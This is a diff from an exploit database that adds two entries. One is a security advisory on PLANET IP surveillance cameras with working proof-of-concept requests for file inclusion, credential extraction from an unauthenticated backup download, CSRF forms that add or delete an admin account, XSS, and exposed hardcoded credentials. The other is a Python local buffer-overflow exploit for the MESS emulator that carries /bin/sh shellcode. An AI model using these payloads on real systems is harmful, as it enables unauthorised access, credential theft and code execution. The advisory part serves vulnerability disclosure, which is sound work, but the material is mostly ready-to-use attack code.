DB: 2016-04-08

2 new exploits

PLANET Technology IP Surveillance Cameras - Multiple Vulnerabilities
Mess Emulator 0.154-3.1 - Local Buffer Overflow

files.csv

@@ -35893,3 +35893,5 @@ id,file,description,date,author,platform,type,port
 39669,platforms/linux/dos/39669.txt,"Linux x86 - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",linux,dos,0
 39670,platforms/windows/local/39670.txt,"Panda Security URL Filtering < 4.3.1.9 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0
 39671,platforms/windows/local/39671.txt,"Panda Endpoint Administration Agent < 7.50.00 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0
+39672,platforms/hardware/webapps/39672.txt,"PLANET Technology IP Surveillance Cameras - Multiple Vulnerabilities",2016-04-07,Orwelllabs,hardware,webapps,443
+39673,platforms/linux/local/39673.py,"Mess Emulator 0.154-3.1 - Local Buffer Overflow",2016-04-07,"Juan Sacco",linux,local,0

platforms/hardware/webapps/39672.txt

@@ -0,0 +1,235 @@
+                         _ _ _       _
+                        | | | |     | |
+  ___  _ ____      _____| | | | __ _| |__  ___
+ / _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|   	
+| (_) | |   \ V  V /  __/ | | | (_| | |_) \__ \
+ \___/|_|    \_/\_/ \___|_|_|_|\__,_|_.__/|___/
+		
+		Security Adivisory
+		   2016-04-06                 www.orwelllabs.com
+	        Twitter:@orwelllabs
+
+				mantra: ...not affect a product that is in scope for... AhHum!
+
+
+
+Overview
+========
+Technical Risk: high
+Likelihood of Exploitation: medium
+Credits: Discovered and researched by Orwelllabs
+CVE-Number: N/A
+DWF: Submited
+Adivisory URL:
+http://www.orwelllabs.com/2016/02/planet-ip-surveillance-camera-local.html
+[1]
+
+
+Issues
+=====
+I.   Local File Inclusion (42 vectors)
+II.  Arbitrary file read/Authentication bypass
+III. Sensitive information disclosure
+IV.  Cross-site request forgery
+V.   Reflected Cross-site scripting
+VI.  hardcoded credentials
+
+
+I. Local File Inclusion
+=======================
+* CLASS: External Control of File Name or Path [CWE-73]
+
+The Web Management interface of PLANET IP surveillance Cams models
+FW-ICA-2500,
+ICA-2250VT, ICA-4200V, ICA-4500V, ICA-3350V, ICA-5350V AND ICA-8350 and
+probably
+others is prone to Local File Include (LFI).
+
+
+PoC
+---
+The request bellow is generated when a new user is added, in this case
+we are adding the following administrative credential for the cam:
+"root:r00tx".
+
+GET /cgi-bin/admin/querylogin.cgi HTTP/1.1
+Host: {xxx.xxx.xxx.xxx}
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101
+Firefox/42.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://
+{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp
+Cookie: ipcam_profile=1; tour_index=-1; IsHideStreamingStatus=yes
+Authorization: Basic YdRRtXW41YXRtad4=
+Connection: keep-alive
+If-Modified-Since: Mon, 08 Jul 2013 11:10:26 GMT
+
+
+If the value of the parameter "redirect" was changed to any system file
+will return the contents of that file, as shown below:
+http://
+{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=/etc/passwd
+
+In this case will retrieved the content of /etc/passwd
+
+Vectors:
+-------
+There are a total of 42 vectors of LFI, the detailed results will be
+published in www.orwelllabs.com [1] soon.
+Basically all menus of the camera (shown below) to submit, add, modify and
+remove settings trigger the corresponding
+scripts to access resource that contains a parameter "redirect" which is
+also affected.
+
+[ ----------------------------]
+[ #1:  Network ---------------] -> 9
+[ #2:  Camera  ---------------] -> 3
+[ #3:  System  -------------- ] -> 2
+[ #4:  Video   -------------- ] -> 4
+[ #5:  Audio   -------------- ] -> 1
+[ #6:  User    -------------- ] -> 1
+[ #7:  Protocol ------------- ] -> 2
+[ #8:  E-Mail  -------------- ] -> 1
+[ #9:  Event Detection ------ ] -> 1
+[ #10: Storage -------------- ] -> 2
+[ #11: Continuous Recording - ] -> 1
+[ #12: Recording List ------- ] -> 0
+[ #13: Event Server --------- ] -> 11
+[ #14: Event Schedule ------- ] -> 4
+[ ----------+---------------  ]
+
+
+
+II. Arbitrary file read/Authentication bypass
+=============================================
+The camera offers a feature to perform the download settings via a backup
+file. However,
+(how acess control is not effective) this file remains accessible via the
+browser for an unauthenticated user.
+
+PoC
+---
+wget --no-check-certificate https://{xxx.xxx.xxx.xxx}/backup.tar.gz
+tar -xzvf backup.tar.gz
+cat tmp/sysConfig/sysenv.cfg|strings|fmt|cut -f8,9 -d" "
+
+It will return the credential to access the camera
+
+Through this vulnerability a user can also obtain the credential of the AP
+to which the camera is connected just parsing
+the file: 'tmp/sysConfig/extra.info'
+
+
+III. Sensitive information disclosure
+=====================================
+Using LFI vulnerability report, a user can obtain sensitive information
+such as username and password by reading the log file, as follows:
+
+{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=&pwd=&grp=&sgrp=&action=&redirect=/var/log/messages
+
+
+IV. Cross-site request forgery
+==============================
+Planet IP cams ICA-* are prone to Multple CSRF.
+
+PoC
+------
+
+- This will create a admin credential: root:r00tx
+
+<html>
+<!-- CSRF PoC - -->
+<body>
+<form action="http://
+{xxx.xxx.xxx.xxx}/setup.cgi?language=ie&adduser=root:r00tx:1">
+<input type="submit" value="Submit form" />
+</form>
+</body>
+</html>
+
+- ICA-5350V
+
+<html>
+<!-- CSRF PoC -->
+<body>
+<form action="http://
+{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp">
+<input type="submit" value="Submit form" />
+</form>
+</body>
+</html>
+
+- Del user root
+
+<html>
+<!-- CSRF PoC -->
+<body>
+<form action="http://
+{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=remove&redirect=asp%2Fuser.asp">
+<input type="submit" value="Submit form" />
+</form>
+</body>
+</html>
+
+
+V. Cross-Site Scripting
+=======================
+Cams models ICA-* are prone to Multiple XSS
+
+POC
+-------
+http://{xxx.xxx.xxx.xxx}/setup.cgi?<script>alert("XSS")</script>
+
+this will pop-up the message XSS in the browser
+
+
+VI. hardcoded credentials
+=========================
+
+The credentials of web management can be found just viewing the source of
+page default_nets.htm:
+
+POC
+------
+https://{xxx.xxx.xxx.xxx}/default_nets.htm
+
+code:
+
+}
+
+function av_onload(){
+CheckMobileMode();
+util_SetUserInfo();
+Loadplay();
+watchdog();
+//alert("watchdog");
+}
+function Loadplay(){
+play("MasterUsr","MasterPwd","554",parseInt("99"),parseInt("99"),"1",parseInt("2"),parseInt("0"),"192.168.1.99","");
+}
+
+
+Vulnerable Packages
+===================
+ICA-2500
+ICA-2250VT
+ICA-4200V
+ICA-4500V
+ICA-3350V
+ICA-5350V
+ICA-8350
+
+
+
+Timeline
+========
+2015-10-02 - Issues discovered
+2015-11-30 - Vendor contacted (advisore sent)
+2015-12-16 - Vendor contacted (asking for feedback about reported issues)
+2015-12-17 - Vendor response (asking for more time to check issues)
+2015-12-21 - RD team replied: can't duplicate vulnerabilities....
+2016-01-13 - Vendor contacted (submitted evidence that the vulnerabilities
+persist and can be reproduced.)
+...and no news after that...

platforms/linux/local/39673.py

@@ -0,0 +1,85 @@
+# Exploit Author: Juan Sacco - http://www.exploitpack.com -
+jsacco@exploitpack.com
+# Program affected: Multi Emulator Super System (MESS)
+# Version: 0.154-3.1
+#
+# Tested and developed under:  Kali Linux 2.0 x86 - https://www.kali.org
+#
+# Program description: MESS is an emulator for various consoles and
+computing systems, sharing a
+# lot of codebase with the MAME project.
+# Kali Linux 2.0 package: pool/non-free/m/mame/mess_0.154-3.1_i386.deb
+# MD5sum: ae8650a6de842e6792ba83785ac0dbef
+# Website: http://mamedev.org/
+#
+# gdb$ run -gamma $(python -c 'print "\x41"*4080')
+# Starting program: /usr/games/mess -gamma $(python -c 'print "\x41"*4080')
+# [Thread debugging using libthread_db enabled]
+# Using host libthread_db library
+"/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
+#
+# Program received signal SIGSEGV, Segmentation fault.
+#
+#
+--------------------------------------------------------------------------[regs]
+#
+#  EAX: 0x00000000  EBX: 0x72203B22  ECX: 0x00001024  EDX: 0xBFFFE094  o d
+I t S z a p c
+#  ESI: 0x00001024  EDI: 0xBFFFE095  EBP: 0x00001024  ESP: 0xBFFFD038  EIP:
+0x41414141
+#  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
+#
+#
+--------------------------------------------------------------------------[code]
+#
+# => 0x9684539: mov    esi,DWORD PTR [ebx+0x48]
+#   0x968453c:  lea    edi,[ebp+esi*1+0x0]
+#   0x9684540:  push   edi
+#   0x9684541:  push   ebx
+#   0x9684542:  call   0x96843b0
+#   0x9684547:  add    esp,0x10
+#   0x968454a:  test   al,al
+#   0x968454c:  je     0x96845ad
+#
+#
+--------------------------------------------------------------------------------
+#
+# 0x41414141 in ?? ()
+#
+# gdb$ backtrace
+#
+# #1  0x41414141 in ?? ()
+
+import os,subprocess
+
+def run():
+  try:
+    print "# Mess Emulator Buffer Overflow by Juan Sacco"
+    print "# This exploit is for educational purposes only"
+    # JUNK + SHELLCODE + NOPS + EIP
+
+    junk = "\x41"*4084
+    shellcode =
+"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
+    nops = "\x90"*12
+    eip = "\xd1\xf3\xff\xbf"
+    subprocess.call(["mess",' ', junk + shellcode + nops + eip])
+
+  except OSError as e:
+    if e.errno == os.errno.ENOENT:
+        print "Sorry, Mess emulator not found!"
+    else:
+        print "Error executing exploit"
+    raise
+
+def howtousage():
+  print "Snap! Something went wrong"
+  sys.exit(-1)
+
+if __name__ == '__main__':
+  try:
+    print "Exploit Mess 0.154-3.1 Local Overflow Exploit"
+    print "Author: Juan Sacco"
+  except IndexError:
+    howtousage()
+run()